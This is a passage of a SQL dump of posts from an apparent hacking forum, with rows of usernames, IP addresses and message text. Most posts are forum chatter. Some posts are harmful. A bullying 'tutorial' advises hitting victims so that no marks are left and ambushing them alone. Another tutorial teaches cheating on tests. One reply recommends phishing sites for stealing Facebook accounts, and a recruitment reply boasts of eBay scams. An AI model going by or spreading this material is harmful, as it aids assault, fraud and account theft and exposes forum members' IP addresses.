around\".\r\n\r\n[b]Tips[/b]\r\nDon\'t bag any other girl around here for two weeks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '98448b8e872c0ada8388fb55e6fd477d', '0', '0'); INSERT INTO mybb_posts VALUES('6576', '1130', '6574', '83', 'RE: [Videos] Dancing with girls [Text tips included]', '0', '4', 'Triple H', '1351481778', '[quote=\'iTzIpod\' pid=\'6574\' dateline=\'1351480609\']\r\nOo. I like how you added videos for a better visual and understanding! :)\r\n[/quote]\r\n\r\nThanks and check out my new tutorial on bagging girls in high school.\r\n\r\nhttp://l33thacking.net/thread-1131.html', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3baea9410b8b4d86f3857d385a97659e', '0', '0'); INSERT INTO mybb_posts VALUES('6577', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '4', 'Triple H', '1351481841', '10/10 \n\nLiked my tutorial.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c69abeffb5fdb96826cd904b3ce22d88', '0', '0'); INSERT INTO mybb_posts VALUES('6578', '1132', '0', '83', '10 Rules for Dealing with Police', '0', '7', 'Romdu62', '1351481959', '[video=youtube]http://www.youtube.com/watch?v=s4nQ_mFJV4I[/video]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '84b20c9279835fe47a2d6f774752cad9', '0', '0'); INSERT INTO mybb_posts VALUES('6579', '1133', '0', '83', '[Tutorial] Cheating on tests', '0', '7', 'Romdu62', '1351482382', '[b]Cheat # 1[/b]\r\n\r\nWrite the answers or formulas at a bandage and put in on your hand.\r\n\r\n[b]Cheat # 2[/b]\r\n\r\nWrite the ansewrs on the gum wrapper\r\n\r\n[b]Cheat # 3[/b]\r\n\r\nWrite the answers between fingers so if they check the palm they can\'t see it.\r\n\r\n[b]Cheat # 4[/b]\r\n\r\nTake a eraser and press it hard on your textbook so the print can get copied on ereaser.\r\n\r\n[b]Cheat # 5[/b]\r\n\r\nWear a jacket and stick paper on to your jacket but inside part so open the zip a little and put your hand on your foreheard. So it looks you are tired but you are actually looking inside your jacket to see the answer.\r\n\r\nGood Luck in cheating!', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3dd5520ae2f679f56a9317f0a0f88d2c', '0', '0'); INSERT INTO mybb_posts VALUES('6580', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '1', 't3h jok3r', '1351482501', 'Accepted and Added!\n\n/Closed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5c45024edf07cdca18285106951fdb1d', '0', '0'); INSERT INTO mybb_posts VALUES('6581', '1112', '6472', '49', 'RE: SUGGESTION', '0', '1', 't3h jok3r', '1351482601', 'Not a bad idea when it comes to repfuck. We have the repfuck feature but no one has gotten repfuck yet. We only repfuck scammers or rep abusers.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c178bf8606164c1c7a1b146363771bd6', '0', '0'); INSERT INTO mybb_posts VALUES('6582', '1127', '6544', '42', 'RE: Up to 100 Hackers to be offered a Job at MI5 or MI6', '0', '258', 'PiXEL^OG', '1351502902', 'LMFAO\n\nI think im gonna go hack some UK sites now.. Just to piss these \"naughty boys\" off XD', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'ed0941501780458b07b4d0a4ed4009ea', '0', '0'); INSERT INTO mybb_posts VALUES('6583', '864', '4640', '79', 'RE: Need some coder to check this code', '0', '67', 'HoverCatz', '1351506225', 'For security, dont use that code on your home computer. I know about a \"bug\" with eval(gzinflate(base64_decode))). The bug is like, if you run it on your local machine, it will download a program from a url and run it without permission. But i cant be sure, its just something i know', '193.161.89.204', '-1046390324', '1', '0', '0', '0', '1', 'edda8bbe95617e3c0bd87026035b910f', '0', '0'); INSERT INTO mybb_posts VALUES('6584', '1134', '0', '35', 'My new pet', '0', '67', 'HoverCatz', '1351506665', 'Hey. Took 2 mins to create my new pet in Photoshop :3', '193.161.89.202', '-1046390326', '1', '0', '0', '0', '1', '94880396c0b9044bf17b68680f5897f4', '0', '0'); INSERT INTO mybb_posts VALUES('6585', '1128', '6562', '67', 'RE: [TuT] Creating a PM system', '0', '67', 'HoverCatz', '1351506888', 'Thanks, will help me a bit for my new forum.', '193.161.89.202', '-1046390326', '1', '0', '0', '0', '1', 'aa8d21c858f3d0317dc23960798ed1bf', '0', '0'); INSERT INTO mybb_posts VALUES('6586', '1122', '6526', '25', 'RE: [TuT]How To Speed Up Your Computer', '0', '67', 'HoverCatz', '1351507960', 'HOLY SHIT this works O: O: :O :O !!! :O My school pc was SLOOOOOOOW then i ran this, and BOOM, gaming pc o.o', '193.161.89.202', '-1046390326', '1', '0', '0', '0', '1', '4e0b2ce4232dd32df60215da1c8f12bb', '0', '0'); INSERT INTO mybb_posts VALUES('6587', '1133', '6579', '83', 'RE: [Tutorial] Cheating on tests', '0', '205', 'mothered', '1351508189', 'I like the one about the bandage.\r\n\r\nNever thought of that.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '46f42d6c4b839f1f9d53fb346b51130b', '0', '0'); INSERT INTO mybb_posts VALUES('6588', '1127', '6544', '42', 'RE: Up to 100 Hackers to be offered a Job at MI5 or MI6', '0', '205', 'mothered', '1351508425', 'I\'ve heard hackers get hired by big corporations, to help protect their systems and business.\r\n\r\nThis doesn\'t surprise me.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e1a3a664be867b79e500abce5e2fb69d', '0', '0'); INSERT INTO mybb_posts VALUES('6589', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '67', 'HoverCatz', '1351509115', 'Works :) But i cant sms and call D:', '193.161.89.202', '-1046390326', '1', '0', '0', '0', '1', '3ded7c235e9670527be7d4f9216a18f5', '0', '0'); INSERT INTO mybb_posts VALUES('6590', '1127', '6588', '42', 'RE: Up to 100 Hackers to be offered a Job at MI5 or MI6', '0', '258', 'PiXEL^OG', '1351524858', '[quote=\'mothered\' pid=\'6588\' dateline=\'1351508425\']\r\nI\'ve heard hackers get hired by big corporations, to help protect their systems and business.\r\n\r\nThis doesn\'t surprise me.\r\n[/quote]\r\n\r\nMI5 and 6 are taking a piss , its known by everyone that they have been highly unorganized throughout time', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '6eb2b1504d649b73d3ea44fd67160b28', '0', '0'); INSERT INTO mybb_posts VALUES('6591', '1133', '6579', '83', 'RE: [Tutorial] Cheating on tests', '0', '228', 'VirtualLegend', '1351526418', 'Or just study for your tests', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2200f81d636a48071b0b485a00d4dca4', '0', '0'); INSERT INTO mybb_posts VALUES('6614', '1122', '6526', '25', 'RE: [TuT]How To Speed Up Your Computer', '0', '228', 'VirtualLegend', '1351536600', 'This is F*cking Awesome THANKS BRO', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'daa6c43e23b91f3d6585527d1d965302', '0', '0'); INSERT INTO mybb_posts VALUES('6615', '1122', '6526', '25', 'RE: [TuT]How To Speed Up Your Computer', '0', '257', 'XxTREYZxX', '1351536738', 'I dont know which lone to choose\n[hr]\nGot it all sorted,\nthanks mate i dont know if it worked', '101.168.85.85', '1705530709', '1', '0', '257', '1351537638', '1', '7f530967acff759db77d18883a9296b8', '0', '0'); INSERT INTO mybb_posts VALUES('6596', '1135', '6593', '4', 'RE: Most Dope General in the building!', '0', '228', 'VirtualLegend', '1351530834', 'Welcome to l33thacking bro\n\nI Hope that you will like it here, stay active and HQ\n\nHave a nice stay', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2f6840146adee7169461df1b3ab686e5', '0', '0'); INSERT INTO mybb_posts VALUES('6597', '1136', '0', '47', 'C++ Tutorial Givaway', '0', '302', 'Mac Miller', '1351530887', '[align=center]This Ebook will help you learn C++ with ease and i decided i could give it away here.\n\nDownload link: www.mediafire.com/?9brcaodub9anoa9\n\nEnjoy[/align]', '208.67.117.50', '-800885454', '0', '0', '302', '1351540401', '1', '930d32d5388e24ca8b99f3cc4d0a2c5b', '0', '1351540401'); INSERT INTO mybb_posts VALUES('6630', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '302', 'Mac Miller', '1351540778', 'There is o way to get unlimited Skype Premium and this doesn\'t look like the method i used to get 7 days of free premium.', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', 'c28b026149a84012ed838f5ca2ebe991', '0', '0'); INSERT INTO mybb_posts VALUES('6617', '1135', '6593', '4', 'RE: Most Dope General in the building!', '0', '257', 'XxTREYZxX', '1351537712', 'Welcome and enjoy your stay :)\nstay active and HQ', '101.168.85.85', '1705530709', '1', '0', '0', '0', '1', '1b13ac25b9303a8232cfb5a03887a77e', '0', '0'); INSERT INTO mybb_posts VALUES('6618', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '257', 'XxTREYZxX', '1351537825', 'Yeah i drink loads of cans when i stay at a mates house :)', '101.168.85.85', '1705530709', '1', '0', '0', '0', '1', '8f1ff605e50cae4c0335ae129937420b', '0', '0'); INSERT INTO mybb_posts VALUES('6599', '1126', '6543', '42', 'RE: Facebook spent $715M on Instagram, $87M on other acquisitions this year', '0', '302', 'Mac Miller', '1351531211', 'Well when you a young billonaire like Mark you want to own everything else that could ever compete or help you out in the long run.', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', '18594e6fc21b8fbfb2c83c19f88e772b', '0', '0'); INSERT INTO mybb_posts VALUES('6600', '1136', '6597', '47', 'RE: C++ Tutorial Givaway', '0', '228', 'VirtualLegend', '1351531307', '1. I have to make it clear, but l33thacking isn\'t a post and i will pm you forum. We are different than HF or other forums that does this. \n\n2. You need to provide more information on your thread. Like how many pages, maybe a picture of the ebook stuff like that\n\nSo just put the download link in the thread', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '0c4aae74e1fa6ae8d25e45aee9497d4e', '0', '0'); INSERT INTO mybb_posts VALUES('6601', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '302', 'Mac Miller', '1351531327', 'I want one idc what you do with it just make it good!!! :D', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', '130f852e79af4c3e4ad260592330d0d0', '0', '0'); INSERT INTO mybb_posts VALUES('6602', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '228', 'VirtualLegend', '1351531420', 'Lmao how can this thread has 505 views xD', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5c7a717cb100220aac65694bad562ea6', '0', '0'); INSERT INTO mybb_posts VALUES('6619', '1133', '6579', '83', 'RE: [Tutorial] Cheating on tests', '0', '257', 'XxTREYZxX', '1351538067', 'Or just work hard and study like virtual legend said :l', '101.168.85.85', '1705530709', '1', '0', '0', '0', '1', '81a290af61382c587fea05685d80428b', '0', '0'); INSERT INTO mybb_posts VALUES('6620', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '257', 'XxTREYZxX', '1351538191', 'Thanks for this,\neven though i already knew on how to do this :)', '101.168.85.85', '1705530709', '1', '0', '0', '0', '1', '9dc7da230cf2357968372f315d50b9c2', '0', '0'); INSERT INTO mybb_posts VALUES('6604', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '53', 'sirchamp', '1351532783', 'No Dont ban Monster Energy. Its the only energy drink which keeps me awake for the whole day. (I cant even sleep at night after I drunk a 0.5l can in the morning.', '76.34.104.196', '1277323460', '1', '0', '0', '0', '1', '3b699f66bc65a4ae7419662b30e7df2a', '0', '0'); INSERT INTO mybb_posts VALUES('6621', '1128', '6562', '67', 'RE: [TuT] Creating a PM system', '0', '257', 'XxTREYZxX', '1351538278', 'Thanks alot for this mate,might be needing this in the future.', '101.168.85.85', '1705530709', '1', '0', '0', '0', '1', '90e25e2ab7cf8dbf4fa11394505ee632', '0', '0'); INSERT INTO mybb_posts VALUES('6622', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '257', 'XxTREYZxX', '1351538636', 'When are we going to make the server for LH.', '101.168.85.85', '1705530709', '1', '0', '0', '0', '1', '5580955a87f74cc1ce461e4c57334cce', '0', '0'); INSERT INTO mybb_posts VALUES('6623', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351539633', '3/10 Kinda common upon other forums.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '40cf7e2ad8a3fc59691666a672dcd81a', '0', '0'); INSERT INTO mybb_posts VALUES('6624', '1134', '6584', '35', 'RE: My new pet', '0', '82', 'iTzIpod', '1351539730', 'It\'s alright :p\nCould add more detail too it or something. But oh well.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bb6066023725a73f978e8e41e59c7516', '0', '0'); INSERT INTO mybb_posts VALUES('6625', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '82', 'iTzIpod', '1351539781', 'I don\'t know VirtualLegend will be making any of these for anyone. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b9459f5d4705dc9673622bea4d10ca29', '0', '0'); INSERT INTO mybb_posts VALUES('6607', '1135', '6593', '4', 'RE: Most Dope General in the building!', '0', '61', 'NXK', '1351533130', 'Welcome, Hope you enjoy it here.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'b420c4b127eee3492e10e323f4fbab94', '0', '0'); INSERT INTO mybb_posts VALUES('6626', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '82', 'iTzIpod', '1351539896', 'Can you tell me what you meant by \"I called and texted a number.\"?\nBecause I can\'t seem to do that.\n\nAlso, misleading title. It\'s not unlimited Skype Premium.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd440ebcff7017a31a745a2f08def4847', '0', '0'); INSERT INTO mybb_posts VALUES('6627', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1351540016', 'Just go on the thread page, and then refresh it 24/7. :p\nIt increases the views on the thread.\nAlso, on the new thread design, you spelled \'Process\' wrong.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89f552f79c1743f3451f5a4c23804387', '0', '0'); INSERT INTO mybb_posts VALUES('6628', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '82', 'iTzIpod', '1351540132', 'Depends on how busy the members are..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '209a4ee44266062ab4256011f67d27bb', '0', '0'); INSERT INTO mybb_posts VALUES('6629', '1136', '6600', '47', 'RE: C++ Tutorial Givaway', '0', '302', 'Mac Miller', '1351540260', '[quote=\'VirtualLegend\' pid=\'6600\' dateline=\'1351531307\']\r\n1. I have to make it clear, but l33thacking isn\'t a post and i will pm you forum. We are different than HF or other forums that does this. \r\n\r\n2. You need to provide more information on your thread. Like how many pages, maybe a picture of the ebook stuff like that\r\n\r\nSo just put the download link in the thread\r\n[/quote]\r\n\r\nSorry for givaway stuff im stuck on doig it like HF cause that is all i do there. sorry. :embarrased:', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', '478cb8fb7da95657e39708316f84bb3f', '0', '0'); INSERT INTO mybb_posts VALUES('6610', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '228', 'VirtualLegend', '1351534341', 'That Almost happend to me, but i surived the comma. I drank 5 cans :(', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'dbbdd095a1d836d9e920de6cdbd473b1', '0', '0'); INSERT INTO mybb_posts VALUES('6611', '1122', '6526', '25', 'RE: [TuT]How To Speed Up Your Computer', '0', '62', 'R?????zo?', '1351534536', 'Nice, I think it actually worked for me :)\nthanks bro.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c04ab7539ec8be160e705b36c66af5be', '0', '0'); INSERT INTO mybb_posts VALUES('6631', '1118', '6627', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '53', 'sirchamp', '1351540830', '[quote=\'iTzIpod\' pid=\'6627\' dateline=\'1351540016\']\r\nJust go on the thread page, and then refresh it 24/7. :p\r\nIt increases the views on the thread.\r\nAlso, on the new thread design, you spelled \'Process\' wrong.\r\n[/quote]\r\n\r\nI didnt make the threaddesign. I really love the threaddesign. The grammatical errors dont matter as long as its understandable :D', '81.117.49.105', '1366634857', '1', '0', '0', '0', '1', '233cf6b8d7eb4f8f2360f4212db29b72', '0', '0'); INSERT INTO mybb_posts VALUES('6632', '988', '5543', '12', 'RE: [TUT] Watch +18 Youtube Videos Without an Account', '0', '302', 'Mac Miller', '1351540913', 'This is cool if i didn\'t post on youtube or didn\'t have an account i would use it.', '208.67.117.50', '-800885454', '0', '0', '0', '0', '1', '155c6d6973a2407e3c536a101b5b1a88', '0', '0'); INSERT INTO mybb_posts VALUES('6633', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '82', 'iTzIpod', '1351541260', 'This isn\'t Free Premium. It\'s just a feature that allows you to Share Screen with others and call with others in a group chat or something.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '79db0c24b67d6a6319fc39ab0caeef82', '0', '0'); INSERT INTO mybb_posts VALUES('6634', '988', '5543', '12', 'RE: [TUT] Watch +18 Youtube Videos Without an Account', '0', '82', 'iTzIpod', '1351541340', 'Oo. That\'s a really cool technique! Thanks for sharing!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3c35d34444343ce15db99f9fa64f78c4', '0', '0'); INSERT INTO mybb_posts VALUES('6635', '1137', '0', '59', '[Ebook]Make $50+ a day usuing AdSense', '0', '302', 'Mac Miller', '1351541469', '[align=center]This Ebook tells you how to make a easy quick $50 you have to be dedicated if you really want $50.\n\nDownload Link: http://www.mediafire.com/?r3gzweypwbuy4j5[/align]', '208.67.117.50', '-800885454', '0', '0', '302', '1351541487', '1', 'a6a739b34f0dacb6b11971300262905e', '0', '1351541487'); INSERT INTO mybb_posts VALUES('6636', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '67', 'HoverCatz', '1351541586', 'This is free Premium. It says my account is Premium on www.skype.com', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', 'b26ffc0528250d2c693c098e72a41cc4', '0', '0'); INSERT INTO mybb_posts VALUES('6637', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '67', 'HoverCatz', '1351541945', '[b]Username:[/b] HoverCatz\n[b]Age:[/b] 17\n[b]Is your English spelling/grammar good?: [/b] Very good\n[b]How many Experience do you have with making money online?:[/b] Legal Ebay scam, Plugin developer (Earns ALOT)\n[b]What for methods do you use?:[/b] Ebay, Java (Eclipse)\n[b]Do you succeed more than you fail, or not?:[/b] Yes.\n[b]Explain Why you want to join the group:[/b] We need more scammers online.\n[b]Profile Link:[/b] http://l33thacking.net/user-67.html', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', 'dcc979eda51f81c9ce0cccf7cab66d58', '0', '0'); INSERT INTO mybb_posts VALUES('6638', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '228', 'VirtualLegend', '1351548818', 'Vouch for Sirchamp 100% Trusted\n\n[img]http://i.imgur.com/Z1mrB.png[/img]\n\nIt was really Quick done \n\nYou must do this guaranteed fast money + you will make alot of profit :D\n\nThanks Sirchamp', '83.83.167.183', '1397991351', '1', '0', '228', '1351548926', '1', '8d2b4d56475b4a20d76cc7b956563649', '0', '1351548926'); INSERT INTO mybb_posts VALUES('6639', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '228', 'VirtualLegend', '1351549090', 'I\'m busy ATM, so people need to wait a little while longer \n\nSorry Guys :(', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '285cbb856f151a731c20117a3bb6ea6a', '0', '0'); INSERT INTO mybb_posts VALUES('6640', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '228', 'VirtualLegend', '1351549156', 'Welcome HoverCatz,\n\nI Hope that i will learn a bit of ebay from you.\n\n:P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '098e099e95492c05e90fbb1bbe276dda', '0', '0'); INSERT INTO mybb_posts VALUES('6641', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '228', 'VirtualLegend', '1351549267', '10/10 Cuz Pokemon was and still is awesome :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'cb6fc81f6c29e9e24574a252d39b2235', '0', '0'); INSERT INTO mybb_posts VALUES('6642', '877', '4747', '11', 'RE: could some one teach how to hack facebook tetrisfreinds', '0', '304', 'anonymous_sam', '1351549369', 'well said phishing site\'s are the easiest way,.', '109.63.12.49', '1832848433', '0', '0', '0', '0', '1', 'd1fb1dcca9f0cacfeee8750be0e3eb47', '0', '0'); INSERT INTO mybb_posts VALUES('6643', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351550507', '20/10.\nI love monkeys bro :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b80275bb3cc1a2fde8f4697116d778fc', '0', '0'); INSERT INTO mybb_posts VALUES('6644', '1138', '0', '42', 'Hurricane Sandy live updates and discussion', '0', '8', 'spacefish36', '1351552988', 'This thread will contain live links to news channels, discussions on how the situation is around your area and other rumors. No shit posts such as i wish i was there etc.\n\n[b]Recommended Link:[/b] http://www.youtube.com/watch?v=yXMU2qwCVag&feature=g-sptl&cid=inp-hs-san\n\n[b]Other News Videos/Channels[/b]\nSky view as Sandy arrives : http://www.youtube.com/watch?v=bGSJ8t0fANQ&feature=BFa&list=PL6cGNLMeqsHCs2l0c4cQfpShMdimzx1l7\n\nAlong East Coast: http://www.youtube.com/watch?v=4CZKgH3bLNE&feature=g-sptl&cid=inp-hs-san\n\nObama speaks about sandy: http://www.youtube.com/watch?v=B6oAY1TbmhU&feature=g-sptl&cid=inp-hs-san\n\n[b]Evacuations[/b]\n- Manhattan\n- New Jersey\n\n\n[b]Other updates[/b]\n\n- New York has heavy rain and wind, Manhattan has already been hit badly. \n- Crane collaspes in Manhattan. (http://www.youtube.com/watch?v=XI7UHdc0NrQ&feature=fvcro&list=PL6cGNLMeqsHCs2l0c4cQfpShMdimzx1l7)\n- West Virgina has heavy snow\n- NJ has a flood\n- NY has a strong wind pressure and people are literally flying in the air.\n- No electricity in Manhattan.\n- Warwick is going to get a flood.\n\n[b]New[/b]\n- Delaware completely flooded.\n- 13.5 feet flood in NYC\n- Hurricane Sandy has knocked down over 70% trees all over the hurricane has been through.\n- Dish blew off in NYC news reporters cars.\n- Way too many power outages, 3 million customers and counting.\n- Subways flooded, to be closed down for a week in NY.\n\nPost other updates below', '72.231.24.165', '1223104677', '0', '0', '8', '1351565840', '1', '5a3f8796784b5f544a09b9087456a8b9', '0', '1351565840'); INSERT INTO mybb_posts VALUES('6645', '1102', '6564', '69', 'RE: What kinds of programs have you coded before', '0', '262', 'RAND0M1ZER', '1351553941', '[quote=\'Apathy\' pid=\'6564\' dateline=\'1351471896\']\r\nI made calculators, for the most part I pay someone to code me whatever I want. :P\r\n[/quote]\r\n\r\nAt least he\'s honest! :P\r\n\r\nI\'ve done a lot of programs for school in C/C++ and Java but mostly I\'ve done a lot of web programming.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '599a21fbb6a58f7848454d86e57bb270', '0', '0'); INSERT INTO mybb_posts VALUES('6646', '1020', '5840', '73', 'RE: How to make your ipod\'s battery 90 percent longer', '0', '302', 'Mac Miller', '1351555879', 'Cool nice i hate when my battery runs out quick now i can make it live way longer.', '184.38.77.152', '-1205449320', '0', '0', '0', '0', '1', '9f256c0e0698db94193df4a684bcaea6', '0', '0'); INSERT INTO mybb_posts VALUES('6647', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '302', 'Mac Miller', '1351556166', 'Doesn\'t work on latest version actually does for like 5-10 seconds then give you \"the glitch achievement\" nevertheless good tut.', '184.38.77.152', '-1205449320', '0', '0', '0', '0', '1', 'a5ab84a360edbf945a2e310759f0868b', '0', '0'); INSERT INTO mybb_posts VALUES('6648', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '82', 'iTzIpod', '1351558075', 'Oh. I see they updated it now. :p\n\nYay I get an achievement! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f7c726b5bb14c5370285add8daf41b27', '0', '0'); INSERT INTO mybb_posts VALUES('6649', '1138', '6644', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '82', 'iTzIpod', '1351558221', 'I\'m really curious on what will it be tonight and tomorrow. :o\n\nI find that reading this guy\'s tweets on Twitter is actually quite amusing. :p\n\n\n@SandysHurricane\n\n:p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '12f934e176e8e7ca1f70d65a64902344', '0', '0'); INSERT INTO mybb_posts VALUES('6650', '1138', '6644', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '257', 'XxTREYZxX', '1351559246', 'Man i hope you guys live \ngood luck boys', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '15255700f5e6bed4ff20e2c9f694610b', '0', '0'); INSERT INTO mybb_posts VALUES('6651', '1020', '5840', '73', 'RE: How to make your ipod\'s battery 90 percent longer', '0', '257', 'XxTREYZxX', '1351559324', 'Yeah now it will be a living ipod :O', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', 'f1f48deb763561b9c2918dcf0dbd2e69', '0', '0'); INSERT INTO mybb_posts VALUES('6652', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '257', 'XxTREYZxX', '1351559517', 'Yeah true just wait-en cause i will defiantly play it :P', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', 'ae410c75efd0f15fe3f17693f56b73d7', '0', '0'); INSERT INTO mybb_posts VALUES('6653', '1138', '6649', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '8', 'spacefish36', '1351559723', '[quote=\'iTzIpod\' pid=\'6649\' dateline=\'1351558221\']\r\nI\'m really curious on what will it be tonight and tomorrow. :o\r\n\r\nI find that reading this guy\'s tweets on Twitter is actually quite amusing. :p\r\n\r\n\r\n@SandysHurricane\r\n\r\n:p\r\n[/quote]\r\n\r\nThat guys useless. i\'m going to update.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '06525002d66e93374aa34f27e1aabb2d', '0', '0'); INSERT INTO mybb_posts VALUES('6654', '1020', '5840', '73', 'RE: How to make your ipod\'s battery 90 percent longer', '0', '82', 'iTzIpod', '1351560347', 'Stop talking about me! :(\n\n\nNah I joke.\n\nFix the MyCode in your OP.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d6c9c407aa959a8531b5881fc71f831', '0', '0'); INSERT INTO mybb_posts VALUES('6655', '1138', '6644', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '82', 'iTzIpod', '1351560385', 'I know he\'s useless. Kinda funny reading his tweets though. (In my Opinion)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cd3a0c30ed1c00c9f28f41d4871cedaa', '0', '0'); INSERT INTO mybb_posts VALUES('6656', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '82', 'iTzIpod', '1351560426', 'You can make your own server right now. And yeah. It would be fun. :) I can help moderate it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f2f0813926a9be3d65b53ba44042d821', '0', '0'); INSERT INTO mybb_posts VALUES('6657', '1139', '0', '83', '[tutorial] How to bully and get away in US', '0', '4', 'Triple H', '1351562475', 'When you bully someone it\'s most likely you are bullying a weak person and you are a pussy to fight a real man so you would most llikely get suspended if the person snitches on you. Now no matter how much you bully and even if you disagree to the fact that you did bully you would still get suspended but if you say you don\'t care you get suspended etc and you didn\'t do anything to the victim then you can be safe because if the suspension is not going to work then there\'s no use of suspending someone. The concept of being suspended is to give them a lesson but if they don\'t care then it\'s useless.\r\n\r\nI would recommend you to stop bullying then but if you do bully and get reported again and there are no witnesses then nothing is going to happen to you. If you get called in say that you already got called in for troubling him when you didn\'t even touch him at all so why would you bother him again. Now since there\'s no action going to be taken, according to the US board of education the victim has to get trasnferred to another school. Nothing happens to the bully.\r\n\r\n[b]Out side of school[/b]\r\n\r\nYou might get into fights outside of the school for bullying but if someone snitches on you then it means that they don\'t want to fight or get into trouble so they won\'t do anything but they can get you beaten up but their friends so watch around for people that stalking you.\r\n\r\n[b]Tips[/b]\r\n\r\n- Don\'t hit so hard that it would leave a mark or else you can get sued/arrested over assault.\r\n- Jump your victim alone so none of your friends can backstab you.\r\n- Act normal infront of the victim and act like you are avoiding them.\r\n- If you are guy then when the victim crosses by you, make sure that you are with a girl to make him jealous.\r\n\r\nREAD THIS TUTORIAL ON SE\'ING YOUR TEACHERS\r\n\r\nhttp://l33thacking.net/thread-19.html', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ed5bf89a8ca08387b682c2bcddaab283', '0', '0'); INSERT INTO mybb_posts VALUES('6658', '1138', '6655', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '8', 'spacefish36', '1351565592', '[quote=\'iTzIpod\' pid=\'6655\' dateline=\'1351560385\']\r\nI know he\'s useless. Kinda funny reading his tweets though. (In my Opinion)\r\n[/quote]\r\n\r\nLol he will die soon.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '389a7e92e0ca531b1130190b12bf23b0', '0', '0'); INSERT INTO mybb_posts VALUES('6659', '19', '54', '16', 'RE: [tut]How to SE your school teachers', '0', '257', 'XxTREYZxX', '1351573428', 'Thanks for the great work will try this.\nahah', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '89a9f3f9a578942e30901c949a5a8ebc', '0', 